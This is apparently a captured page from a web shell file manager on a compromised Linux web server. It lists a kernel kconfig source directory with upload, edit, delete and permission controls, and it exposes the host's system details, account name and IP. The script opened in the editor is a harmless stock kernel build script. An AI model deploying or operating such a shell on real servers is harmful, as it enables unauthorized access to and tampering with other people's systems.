[ SYSTEM ]: Linux srv.persadacompanies.com 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
[ SERVER ]: Apache | PHP: 8.4.19
[ USER ]: persadamedika | IP: 45.64.1.108
GEFORCE FILE MANAGER
/
usr
/
src
/
kernels
/
4.18.0-553.63.1.el8_10.x86_64
/
scripts
/
kconfig
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 lxdialog
SET
[ DEL ]
📁 tests
SET
[ DEL ]
📄 Makefile
8,022 B
SET
[ EDIT ]
|
[ DEL ]
📄 conf
116,264 B
SET
[ EDIT ]
|
[ DEL ]
📄 conf.c
15,730 B
SET
[ EDIT ]
|
[ DEL ]
📄 confdata.c
25,762 B
SET
[ EDIT ]
|
[ DEL ]
📄 expr.c
30,824 B
SET
[ EDIT ]
|
[ DEL ]
📄 expr.h
9,898 B
SET
[ EDIT ]
|
[ DEL ]
📄 gconf-cfg.sh
579 B
SET
[ EDIT ]
|
[ DEL ]
📄 gconf.c
38,921 B
SET
[ EDIT ]
|
[ DEL ]
📄 gconf.glade
25,642 B
SET
[ EDIT ]
|
[ DEL ]
📄 images.c
6,565 B
SET
[ EDIT ]
|
[ DEL ]
📄 kconf_id.c
1,854 B
SET
[ EDIT ]
|
[ DEL ]
📄 list.h
3,749 B
SET
[ EDIT ]
|
[ DEL ]
📄 lkc.h
4,157 B
SET
[ EDIT ]
|
[ DEL ]
📄 lkc_proto.h
2,520 B
SET
[ EDIT ]
|
[ DEL ]
📄 mconf-cfg.sh
1,009 B
SET
[ EDIT ]
|
[ DEL ]
📄 mconf.c
28,104 B
SET
[ EDIT ]
|
[ DEL ]
📄 menu.c
21,978 B
SET
[ EDIT ]
|
[ DEL ]
📄 merge_config.sh
4,298 B
SET
[ EDIT ]
|
[ DEL ]
📄 nconf-cfg.sh
1,080 B
SET
[ EDIT ]
|
[ DEL ]
📄 nconf.c
39,151 B
SET
[ EDIT ]
|
[ DEL ]
📄 nconf.gui.c
15,108 B
SET
[ EDIT ]
|
[ DEL ]
📄 nconf.h
1,875 B
SET
[ EDIT ]
|
[ DEL ]
📄 preprocess.c
11,241 B
SET
[ EDIT ]
|
[ DEL ]
📄 qconf-cfg.sh
692 B
SET
[ EDIT ]
|
[ DEL ]
📄 qconf.cc
44,862 B
SET
[ EDIT ]
|
[ DEL ]
📄 qconf.h
7,544 B
SET
[ EDIT ]
|
[ DEL ]
📄 streamline_config.pl
16,564 B
SET
[ EDIT ]
|
[ DEL ]
📄 symbol.c
29,999 B
SET
[ EDIT ]
|
[ DEL ]
📄 util.c
2,897 B
SET
[ EDIT ]
|
[ DEL ]
📄 zconf.l
8,457 B
SET
[ EDIT ]
|
[ DEL ]
📄 zconf.lex.c
66,655 B
SET
[ EDIT ]
|
[ DEL ]
📄 zconf.tab.c
73,196 B
SET
[ EDIT ]
|
[ DEL ]
📄 zconf.y
16,925 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: gconf-cfg.sh
#!/bin/sh # SPDX-License-Identifier: GPL-2.0 PKG="gtk+-2.0 gmodule-2.0 libglade-2.0" if ! pkg-config --exists $PKG; then echo >&2 "*" echo >&2 "* Unable to find the GTK+ installation. Please make sure that" echo >&2 "* the GTK+ 2.0 development package is correctly installed." echo >&2 "* You need $PKG" echo >&2 "*" exit 1 fi if ! pkg-config --atleast-version=2.0.0 gtk+-2.0; then echo >&2 "*" echo >&2 "* GTK+ is present but version >= 2.0.0 is required." echo >&2 "*" exit 1 fi echo cflags=\"$(pkg-config --cflags $PKG)\" echo libs=\"$(pkg-config --libs $PKG)\"